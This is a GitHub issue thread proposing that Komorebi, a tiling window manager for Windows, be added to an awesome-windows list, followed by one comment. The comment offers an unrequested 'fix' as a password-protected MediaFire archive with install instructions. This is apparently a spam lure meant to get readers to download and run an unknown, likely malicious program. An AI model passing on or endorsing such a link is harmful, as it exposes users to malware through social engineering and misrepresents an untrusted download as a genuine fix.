### ISSUE TITLE
[ADD] Komorebi

### ISSUE THREAD

**Issue by 0PandaDEV** [0PandaDEV/awesome-windows#8]
### Application Name

Komorebi

### Application URL

https://lgug2z.github.io/komorebi/

### Category

Customization

### Description

A tiling window manager for Windows

### Application Attributes

- [X] Free
- [X] Open Source
- [ ] Paid
- [ ] Freemium (free with paid features)

### Repository URL

https://github.com/LGUG2Z/komorebi

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
